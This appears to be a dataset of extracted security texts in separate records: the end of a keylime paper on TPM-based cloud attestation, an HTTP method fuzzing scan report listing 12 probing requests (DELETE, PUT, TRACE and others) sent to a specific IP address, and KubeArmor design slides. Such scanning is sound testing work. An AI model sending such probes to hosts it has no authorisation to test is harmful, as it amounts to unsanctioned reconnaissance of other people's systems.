\frst establish a baseline for the performance of TPM\noperations with the IBM client library, our Python wrap-\nper code, the Xen virtual TPM, and the physical TPM. We\nbenchmarked both TPM quote creation and veri\fcation on\nthe Xen host (Table 2). We collected the physical TPM mea-\nsurements on the same system with a standard (non-Xen)\n15http://ipsec-tools.sourceforge.net/\n16https://openvpn.net/Table 2: Average TPM Operation Latency (ms).\nTPM vTPM Deep quote\nCreate Quote 725 68.5 1390\nCheck Quote 4.64 4.64 5.33\nkernel. We collected both vTPM quote and deep quote mea-\nsurements from a domain running on Xen. As expected, op-\nerations that require interaction with the physical TPM are\nslow. Veri\fcation times, even for deep quotes that include\ntwo RSA signature veri\fcations, are comparatively quick.\n5.2 Key Derivation Protocol\nWe next investigate the CV latency of di\u000berent phases\nof our protocol. In Figures 6 and 7, we show the aver-\naged results of hundreds of trials of the CV with 100 vTPM\nequipped VMs. Each operation includes a full REST in-\nteraction along with the relevant TPM and cryptographic\noperations. We also benchmarked the latency of the pro-\ntocol phases emulating zero latency from the TPM (Null\nTPM). This demonstrates the minimum latency of our CV\nsoftware architecture including the time required to verify\nquotes. The results from the Null TPM trials indicate that\nour network protocol and other processing impose very little\nadditional overhead, even on the relatively modestly pow-\nered Raspberry Pi. The bare metal system had a slightly\nlarger network RTT to the nodes it was verifying causing it\nto have a higher latency than the less powerful m1.large.\nIn Figure 7, we see that latency for the quote retrieval\nprocess is primarily a\u000bected by slow TPM operations and is\ncomparable to prior work [31]. The bootstrapping latency\nis the sum of the latencies for retrieving a quote and provid-\ning V. We \fnd the bootstrapping latency for bare metal and\nvirtual machines to be approximately 793ms and 1555ms re-\nspectively. Virtual nodes doing runtime integrity measure-\nment after bootstrapping bene\ft from much lower latency\nfor vTPM operations. Thus, for a virtual machine with a\nvTPM, keylime can detect integrity violations in as little as\n110ms. The detection latency for a system with a physical\nTPM (781ms for our Xen host) is limited by the speed of\nthe physical TPM at generating quotes.\n5.3 Scalability of Cloud Verifier\nNext we establish the maximum rate at which the CV can\nget and check quotes for sustained integrity measurement.\nThis will de\fne the trade-o\u000b between the number of nodes\na single CV can handle and the latency between when an\nintegrity violation occurs and the CV detects it. Since the\nCV quote checking process is a simple round robin check of\neach node, it is easy to parallelize across multiple CVs fur-\nther enhancing scalability. We emulate an arbitrarily large\npopulation of real cloud nodes using a \fxed number test\ncloud nodes. These test cloud nodes emulate a zero latency\nTPM by returning a pre-constructed quote. This way the\ntest nodes appear like a larger population where the CV will\nnever have to block for a lengthy TPM operation to com-\nplete. We found that around 500 zero latency nodes were\nsu\u000ecient to achieve the maximum quote checking rate.\nWe show the average number of quotes veri\fed per second\nfor each of our CV deployment options in Figure 8. Because\nof our process-based worker pool architecture, the primary\nfactor a\u000becting CV scalability is the number of cores and 0 10 20 30 40 50 60\nProvide V Null TPMLatency (ms)Bare Metal\nm1.large\nm1.small\nRaspberry PiFigure 6: Latency of keylime boot-\nstrapping protocol.\n 0 200 400 600 800 1000 1200 1400 1600\nvTPM Quote TPM Quote DeepQuoteLatency (ms)Bare Metal\nm1.large\nm1.small\nRaspberry PiFigure 7: Latency of TPM opera-\ntions in bootstrapping protocol.\n 0 500 1000 1500 2000 2500\nBare Metal m1.large m1.smallRaspberry PiIntegrity Check Rate (quotes/s)Figure 8: Maximum CV quote\nchecking rate of keylime .\n 0 500 1000 1500 2000 2500\n 0 50 100 150 200 250 300Rate (quotes/s)\nNum CV Processes\nFigure 9: Scaling the CV on bare metal\nRAM available. These options provide a variety of choices\nfor deploying the CV. For small cloud tenants a low cost\nVM or inexpensive hardware appliance can easily verify hun-\ndreds of virtual machines with moderate detection latency\n(5-10s). For larger customers, a well-resourced VM or dedi-\ncated hardware can scale to thousands with similar latency.\nFor high security environments, all options can provide sub-\nsecond detection and response time. In future work, we plan\nto implement a priority scheme that allows the tenant to set\nthe rate of veri\fcations for di\u000berent classes of nodes.\nWe next show how our CV architecture can scale by adding\nmore cores and parallelism. We use the bare metal CV and\nshow the average rate of quotes retrieved and checked per\nsecond for 500 test nodes in Figure 9. We see linear speed-\nup until we exhaust the parallelism of the host CPU and\nthe concurrent delay of waiting for many cloud nodes. This\nperformance represents a modest performance improvement\nover Schi\u000bman et al.'s CV which was able to process approx-\nimately 2,000 quotes per second on unspeci\fed hardware [34]\nand a substantial improvement over the Excalibur monitor's\nability to check approximately 633 quotes per second [31].\n5.4 On-Premises Cloud Verifier\nFinally, we investigate the performance of the CV when\nhosted at the tenant site away from the cloud. We show\nthe results of our bare metal system's quote veri\fcation\nrate and the bandwidth used for a variety of network de-Table 3: On-Premises bare metal CV verifying 250\nCloud Nodes using 50 CV processes.\nNetwork RTT Rate Bandwidth\n(ms) (quotes/s) (Kbits/s)\n4ms (native) 937 3085\n25ms 613 2017\n50ms 398 1310\n75 ms 282 928.3\n100 ms 208 684.7\n150 ms 141 464.2\nlays we inserted using the comcast17tool in Table 3. These\nresults show that it is possible to run the CV on-premises at\nthe tenant site at the cost of a reduction in quote checking\nrate (and therefore detection latency) and several Mbit/s\nof bandwidth. As such, we recommend the highest perfor-\nmance and lowest cost option is to run the CV in the cloud\nalongside the nodes it will verify.\n6. RELATED WORK\nMany of the challenges that exist in traditional enterprise\nnetworks exist in cloud computing environments as well.\nHowever, there are new challenges and threats including\nshared tenancy and additional reliance on the cloud provider\nto provide a secure foundation [4, 16]. To address some of\nthe challenges, many have proposed trusted computing.\nThe existing speci\fcations for trusted computing rely on\ntrusted hardware, and assume a single owner of the system.\nWith the advent of cloud computing, this assumption is no\nlonger valid. While both the standards community [41] and\nprior work [2] is beginning the process of supporting virtu-\nalization, no end-to-end solution exists. For example, the\ncTPM system [5] assumes a trustworthy cloud provider and\nrequires modi\fcations to trusted computing standards. An-\nother proposal for higher-level validation of services provides\na cryptographically signed audit trail that the hypervisor\nprovides to auditors [12]. The audit trail captures the exe-\ncution of the applications within the virtual machine. This\nproposal does not provide a trusted foundation for the audit\ntrail, and assumes a benign hypervisor. Bleikertz, et al., pro-\npose to use trusted computing to provide cryptographic ser-\nvices for cloud tenants[3]. Their Cryptography-as-a-Service\n(CaaS) system relies on trusted computing, but does not ad-\ndress bootstrapping and requires hypervisor modi\fcations\n17https://github.com/tylertreat/Comcastthat cloud providers are unlikely to support.\nTo address the issues of scalability, several proposals ex-\nist to monitor a cloud infrastructure, and allow for valida-\ntion of the virtual machines controlled by the tenants of the\ncloud [34, 32, 33, 35]. The cloud veri\fer pattern proposed\nby Schi\u000bman, et al., allows a single veri\fer to validate trust\nin the cloud infrastructure, and in turn the cloud veri\fer\n\\vouches\" for the integrity of the cloud nodes. This removes\nthe need for tenants to validate the integrity of the hyper-\nvisor hosts prior to instantiating cloud nodes on them and\navoids the need for nodes to mutually attest each other be-\nfore communicating. The tenant simply provides their in-\ntegrity veri\fcation criteria to the veri\fer, and the veri\fer en-\nsures that the tenant's integrity criteria are satis\fed as part\nof scheduling resources. We utilize the cloud veri\fer pat-\ntern in our work, with some important di\u000berences. First we\nextend it to support secure system bootstrapping for both\nbare metal and virtualized IaaS environments. Second, we\ndo not host any tenant-owned parts of the integrity mea-\nsurement infrastructure in the provider's control as they do.\nThis means that our solution is substantially less invasive\nto the cloud provider's infrastructure (e.g., they required\nnearly 5,000 lines of code to be added to OpenStack) and\nis less prone to compromise. For example, keylime relies\nupon the vTPM integrity measurements inside tenant nodes\nrather than enabling the cloud provider to have explicit vir-\ntual machine introspection (i.e., secret stealing) capabilities.\nExcalibur works to address the scalability problems of\ntrusted computing by leveraging ciphertext policy attribute-\nbased encryption (CPABE) [31]. This encryption scheme\nallows data to be encrypted using keys that represent at-\ntributes of the hypervisor hosts in the IaaS environment\n(e.g., software version, country, zone). Using Excalibur,\nclients can encrypt sensitive data, and be assured that a\nhypervisor will only be given access to the data if the policy\n(the speci\fed set of attributes) is satis\fed. Excalibur only\naddresses trusted bootstrapping for the underlying cloud\nplatform. Therefore, a compromised tenant node would be\nneither detected nor prevented. The Excalibur monitor is\na provider-owned (but attested) component that holds the\nencryption keys that allow a node to boot on a particu-\nlar hypervisor. keylime uses secret sharing to avoid having\nbootstrap key stored (and therefore vulnerable) in any cloud\nsystems except for in the cloud node for which they are in-\ntended.\nThe CloudProxy Tao system provides building blocks to\nestablish trusted services in a layered cloud environment [25].\nThe Tao environment relies on the TPM to establish iden-\ntity and load-time integrity of the nodes and software in\nthe system. Their system does not support system integrity\nmonitoring as they assume that all interactions will only be\nwith other trusted programs running in the Tao environ-\nment. Tao relies upon mutual attestation for all communi-\ncating nodes, but is unable to use TPM-based keys because\nthey are not fast enough to support mutual attestation. Us-\ning the out-of-band CV, we avoid mutual attestation while\nmaintaining rapid detection of integrity violations. The Key\nServer in Tao holds all the secret keys to the system, must\ninteract with hosts to load new applications, and must be\nfully trusted. The Key Server does not o\u000ber compatible de-\nployment options for IaaS environments, especially for small\ntenants who cannot a\u000bord secure facilities or hardware se-\ncurity modules. Furthermore, CloudProxy Tao does not de-tail the secure bootstrapping of their Key Server or Privacy\nCA component for TPM initialization. keylime explicitly\ndescribes bootstrapping of all relevant components and en-\nables multiple realistic secure deployment options for CV\nand registrar hosting.\n7. CONCLUSION\nIn this paper, we have shown that keylime provides a\nfully integrated solution to bootstrap and maintain hardware-\nrooted trust in elastically provisioned IaaS clouds. We have\ndemonstrated that we can bootstrap hardware-rooted cryp-\ntographic identities into both physical and virtual cloud\nnodes, and leverage those identities in higher-level security\nservices, without requiring each service to become trusted\ncomputing-aware. keylime uses a novel key derivation pro-\ntocol that incorporates a tenant's intent to provision new\ncloud resources with integrity measurement. Finally, we\nhave demonstrated and evaluated several deployment sce-\nnarios for our system's critical component, the cloud ver-\ni\fer. keylime can securely derive a key in less than two\nseconds during the provisioning and bootstrapping process,\nand requires as little as 110ms to respond to an integrity\nviolation. Furthermore, we have shown that keylime can\nscale to support thousands of IaaS nodes while maintaining\nquick response to integrity violations.\n8. REFERENCES\n[1] S. Balfe and A. Mohammed. Final fantasy { securing\non-line gaming with trusted computing. In B. Xiao,\nL. Yang, J. Ma, C. Muller-Schloer, and Y. Hua,\neditors, Autonomic and Trusted Computing , volume\n4610 of Lecture Notes in Computer Science , pages\n123{134. Springer Berlin Heidelberg, 2007.\n[2] S. Berger, R. C\u0013 aceres, K. A. Goldman, R. Perez,\nR. Sailer, and L. van Doorn. vtpm: Virtualizing the\ntrusted platform module. In Proceedings of the 15th\nConference on USENIX Security Symposium - Volume\n15, USENIX-SS'06, Berkeley, CA, USA, 2006.\nUSENIX Association.\n[3] S. Bleikertz, S. Bugiel, H. Ideler, S. N urnberger, and\nA.-R. Sadeghi. Client-controlled\ncryptography-as-a-service in the cloud. In\nM. Jacobson, M. Locasto, P. Mohassel, and\nR. Safavi-Naini, editors, Applied Cryptography and\nNetwork Security , volume 7954 of Lecture Notes in\nComputer Science , pages 19{36. Springer Berlin\nHeidelberg, 2013.\n[4] S. Bouchenak, G. Chockler, H. Chockler,\nG. Gheorghe, N. Santos, and A. Shraer. Verifying\ncloud services: Present and future. SIGOPS Oper.\nSyst. Rev. , 47(2):6{19, July 2013.\n[5] C. Chen, H. Raj, S. Saroiu, and A. Wolman. ctpm: A\ncloud tpm for cross-device trusted applications. In\n11th USENIX Symposium on Networked Systems\nDesign and Implementation (NSDI 14) , Seattle, WA,\nApr. 2014. USENIX Association.\n[6] X. Chen, T. Gar\fnkel, E. C. Lewis, P. Subrahmanyam,\nC. A. Waldspurger, D. Boneh, J. Dwoskin, and D. R.\nPorts. Overshadow: A virtualization-based approach\nto retro\ftting protection in commodity operating\nsystems. SIGPLAN Not. , 43(3):2{13, Mar. 2008.[7] J. Criswell, N. Dautenhahn, and V. Adve. Virtual\nghost: Protecting applications from hostile operating\nsystems. SIGARCH Comput. Archit. News ,\n42(1):81{96, Feb. 2014.\n[8] L. Davi, A.-R. Sadeghi, and M. Winandy. Dynamic\nintegrity measurement and attestation: towards\ndefense against return-oriented programming attacks.\nInProceedings of the 2009 ACM workshop on Scalable\ntrusted computing , pages 49{54. ACM, 2009.\n[9] A. Dinaburg, P. Royal, M. Sharif, and W. Lee. Ether:\nMalware analysis via hardware virtualization\nextensions. In Proceedings of the 15th ACM\nConference on Computer and Communications\nSecurity , CCS '08, pages 51{62, New York, NY, USA,\n2008. ACM.\n[10] M. Fioravante and D. D. Graaf. vTPM.\nhttp://xenbits.xen.org/docs/unstable/misc/vtpm.txt,\nNovember 2012.\n[11] D. D. Graaf and Q. Xu. vTPM manager.\nhttp://xenbits.xen.org/docs/unstable/misc/vtpmmgr.txt.\n[12] A. Haeberlen, P. Aditya, R. Rodrigues, and\nP. Druschel. Accountable virtual machines. In\nProceedings of the 9th USENIX Conference on\nOperating Systems Design and Implementation ,\nOSDI'10, pages 1{16, Berkeley, CA, USA, 2010.\nUSENIX Association.\n[13] J. Hennessey, C. Hill, I. Denhardt, V. Venugopal,\nG. Silvis, O. Krieger, and P. Desnoyers. Hardware as a\nservice - enabling dynamic, user-level bare metal\nprovisioning of pools of data center resources. In 2014\nIEEE High Performance Extreme Computing\nConference , Waltham, MA, USA, Sept. 2014.\n[14] P. Hintjens. Curvezmq authentication and encryption\nprotocol. http://rfc.zeromq.org/spec:26, 2013.\n[15] O. S. Hofmann, S. Kim, A. M. Dunn, M. Z. Lee, and\nE. Witchel. Inktag: Secure applications on an\nuntrusted operating system. SIGPLAN Not. ,\n48(4):265{278, Mar. 2013.\n[16] W. Huang, A. Ganjali, B. H. Kim, S. Oh, and D. Lie.\nThe state of public infrastructure-as-a-service cloud\nsecurity. ACM Comput. Surv. , 47(4):68:1{68:31, June\n2015.\n[17] IBM. Ibm and intel bring new security features to the\ncloud. http://www.softlayer.com/press/\nibm-and-intel-bring-new-security-features-cloud,\nSeptember 2004.\n[18] IBM. Software trusted platform module.\nhttp://sourceforge.net/projects/ibmswtpm/, April\n2014.\n[19] Intel. Intel Trusted Boot (tboot).\nhttps://software.intel.com/en-us/articles/\nintel-trusted-execution-technology.\n[20] Intel. Cloud integrity technology. http://www.intel.\ncom/p/en US/support/highlights/sftwr-prod/cit,\n2015.\n[21] T. Jaeger, R. Sailer, and U. Shankar. Prima:\nPolicy-reduced integrity measurement architecture. In\nProceedings of the Eleventh ACM Symposium on\nAccess Control Models and Technologies , SACMAT\n'06, pages 19{28, New York, NY, USA, 2006. ACM.\n[22] B. Kauer. Oslo: Improving the security of trusted\ncomputing. In Proceedings of 16th USENIX SecuritySymposium on USENIX Security Symposium , SS'07,\npages 16:1{16:9, Berkeley, CA, USA, 2007. USENIX\nAssociation.\n[23] R. Kotla, T. Rodehe\u000ber, I. Roy, P. Stuedi, and\nB. Wester. Pasture: Secure o\u000fine data access using\ncommodity trusted hardware. In Presented as part of\nthe 10th USENIX Symposium on Operating Systems\nDesign and Implementation (OSDI 12) , pages\n321{334, Hollywood, CA, 2012. USENIX.\n[24] P. A. Loscocco, P. W. Wilson, J. A. Pendergrass, and\nC. D. McDonell. Linux kernel integrity measurement\nusing contextual inspection. In Proceedings of the 2007\nACM Workshop on Scalable Trusted Computing , STC\n'07, pages 21{29, New York, NY, USA, 2007. ACM.\n[25] J. Manferdelli, T. Roeder, and F. Schneider. The\ncloudproxy tao for trusted computing. Technical\nReport UCB/EECS-2013-135, EECS Department,\nUniversity of California, Berkeley, Jul 2013.\n[26] P. Maniatis, D. Akhawe, K. Fall, E. Shi, S. McCamant,\nand D. Song. Do you know where your data are?:\nSecure data capsules for deployable data protection. In\nProceedings of the 13th USENIX Conference on Hot\nTopics in Operating Systems , HotOS'13, pages 22{22,\nBerkeley, CA, USA, 2011. USENIX Association.\n[27] D. A. McGrew and J. Viega. The galois/counter mode\nof operation (gcm). NIST , 2005.\n[28] T. Moyer, K. Butler, J. Schi\u000bman, P. McDaniel, and\nT. Jaeger. Scalable web content attestation. IEEE\nTransactions on Computers , Mar 2011.\n[29] S. Munetoh. GRUB TCG Patch to Support Trusted\nBoot. http://trousers.sourceforge.net/grub.html.\n[30] R. Sailer, X. Zhang, T. Jaeger, and L. van Doorn.\nDesign and implementation of a tcg-based integrity\nmeasurement architecture. In Proceedings of the 13th\nConference on USENIX Security Symposium - Volume\n13, SSYM'04, pages 16{16, Berkeley, CA, USA, 2004.\nUSENIX Association.\n[31] N. Santos, R. Rodrigues, K. P. Gummadi, and\nS. Saroiu. Policy-sealed data: A new abstraction for\nbuilding trusted cloud services. In Presented as part of\nthe 21st USENIX Security Symposium (USENIX\nSecurity 12) , pages 175{188, Bellevue, WA, 2012.\nUSENIX.\n[32] J. Schi\u000bman, T. Moyer, C. Shal, T. Jaeger, and\nP. McDaniel. Justifying integrity using a virtual\nmachine veri\fer. In Computer Security Applications\nConference, 2009. ACSAC '09. Annual , pages 83{92,\nDec 2009.\n[33] J. Schi\u000bman, T. Moyer, H. Vijayakumar, T. Jaeger,\nand P. McDaniel. Seeding clouds with trust anchors.\nInProceedings of the 2010 ACM Workshop on Cloud\nComputing Security Workshop , CCSW '10, pages\n43{46, New York, NY, USA, 2010. ACM.\n[34] J. Schi\u000bman, Y. Sun, H. Vijayakumar, and T. Jaeger.\nCloud veri\fer: Veri\fable auditing service for iaas\nclouds. In Services (SERVICES), 2013 IEEE Ninth\nWorld Congress on , pages 239{246, June 2013.\n[35] J. Schi\u000bman, H. Vijayakumar, and T. Jaeger.\nVerifying system integrity by proxy. In Proceedings of\nthe 5th International Conference on Trust and\nTrustworthy Computing , TRUST'12, pages 179{200,\nBerlin, Heidelberg, 2012. Springer-Verlag.[36] A. Segall. Using the tpm: Machine authentication and\nattestation. http://opensecuritytraining.info/\nIntroToTrustedComputing \fles/Day2-1-auth-and-att.\npdf, Oct 2012.\n[37] E. G. Sirer, W. de Bruijn, P. Reynolds, A. Shieh,\nK. Walsh, D. Williams, and F. B. Schneider. Logical\nattestation: An authorization architecture for\ntrustworthy computing. In Proceedings of the\nTwenty-Third ACM Symposium on Operating Systems\nPrinciples , SOSP '11, pages 249{264, New York, NY,\nUSA, 2011. ACM.\n[38] Trusted Computing Group. TCG Infrastructure\nWorking Group A CMC Pro\fle for AIK Certi\fcate\nEnrollment. http:\n//www.trustedcomputinggroup.org/\fles/resource\n\fles/738DF0BB-1A4B-B294-D0AF6AF9CC023163/\nIWG CMC Pro\fle Cert Enrollment v1r7.pdf.\n[39] Trusted Computing Group. Trusted Network\nCommunications.\nhttp://www.trustedcomputinggroup.org/developers/\ntrusted network communications.\n[40] Trusted Computing Group. Trusted Platform Module.\nhttp://www.trustedcomputinggroup.org/developers/\ntrusted platform module.\n[41] Trusted Computing Group. Virtualized Platform.\nhttp://www.trustedcomputinggroup.org/developers/\nvirtualized platform." } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 18_43_22.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 4/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:43:22\nTime taken 00:00:08.364\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "KubeArmor Design.pdf", "project_name": "KubeArmor", "subcategory": "Security & Compliance" }
[ { "data": "KubeArmor \nInternal Design Agenda \n1.Architectural Overview of KubeArmor \n2.Components in KubeArmor \na. KubeArmor Core Engine \nb. Platform Handler \nc.LSM Enforcer \ni.AppArmor Enforcer \nii.SELinux Enforcer \nd. System Monitor \ne. Logger Architectural Overview of KubeArmor KubeArmor \nHigh-level definition ⇒ Runtime security enforcement system for containers and VMs \nHigh level point of view Architectural Overview of KubeArmor \nKubernetes \nMultiple VMs \n(KVM Service) \nSelf-managed VM Platform Handler \n(k8s, docker, containerd) \nKVM Agent KubeArmor \nCore Engine AppArmor \nEnforcer \nSELinux \nEnforcer \nSystem \nMonitor \nLogger \n(Feeder) gRPC Service \nkarmor CLI Alerts \nLogs \nKubeArmor Where KubeArmor is? \nKubernetes Multiple VMs Self-managed VM Node Node VM VM VMKubeArmor KubeArmor \nDaemonSet in Kubernetes KubeArmor KubeArmor KubeArmor \nSystemd daemon in a VM Policies → Kubernetes CR Policies → KVMService Policies → KubeArmor \nSystemd daemon in a VM KVMService karmor CLI KubeArmor Components Component initialization KubeArmor Core Engine \nKubeArmor \nPlatform Handler LSM Enforcer Logger System Monitor \nK8s Handler \nDocker Handler \nContainerd Handler AppArmor Enforcer \nSELinux Enforcer gRPC Config \nKVM Agent Platform Handler \nKubernetes \nDocker \nContainerd Node \nPod\nSecurity Policy \nContainer \nContainer \n< Event-driven watcher > NodeName, NodeIP, Labels, Annotations, … \nPodName, Labels, Annotations, Containers, … \nPolicyName, PolicySpec, … \nContainerName, ContainerID, \nAppArmorProfile, PidNS, MntNS, … \nContainerName, ContainerID, \nAppArmorProfile, PidNS, MntNS, … \nKVMService Security Policy PolicyName, PolicySpec, … KubeArmor Core Engine \nEndPoint \nNode Name \nNamespace Name \nEndPoint Name \nLabels \nList of Containers \nList of AppArmor Profiles \nList of SELinux Profiles \nList of Security Policies Node \nPod\nSecurity Policy \nContainer KubeUpdate LSM Enforcer LSM Enforcer: AppArmor \nAppArmor → File-based security enforcement \nSecurity Policy #1 \nSecurity Policy #2 AppArmor Enforcer AppArmor Profile \nAppArmor LSM \nEndPoint LSM Enforcer: SELinux \nSELinux → Label-based security enforcement \nSecurity Policy #1 \nSecurity Policy #2 SELinux Enforcer \nKubeArmor Profile \nKubeArmor SELinux Updater \nbash dash cat ls\nbin_t karmor_exec_t bin_tkarmor_block_t \nkarmor_exec_t /bin/dash karmor_block_t /bin/ls \nkarmor SELinux module System Monitor \n(dash) $ ls \nPermission Denied SYS_EXECVE \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nCOMM: ls \nRESULT: -11 SECURITY_BPRM_CHECK \nPidNS: 1234 \nMntNS: 5678 \nPPID: 9 \nPID: 10 \nPATH: /bin/dash \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nPATH: /bin/ls System Monitor (eBPF) \nSystem Monitor SYS_OEPN … …kprobe, kretprobe, tracepoint Logger (Feeder) \nSystem Monitor \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nCOMM: ls \nRESULT: -11 PidNS: 1234 \nMntNS: 5678 \nPPID: 9 \nPID: 10 \nPATH: /bin/dash \nPidNS: 1234 \nMntNS: 5678 \nPPID: 10 \nPID: 11 \nPATH: /bin/ls Platform Handler Container EndPoint \nPidNS: 1234 \nMntNS: 5678 \nNamespaceName: XXX \nPodName: YYY \nContainerName: ZZZ NamespaceName: XXX \nPodName: YYY \nList of security policies \nNamespaceName: XXX \nPodName: YYY , ContainerName: ZZZ 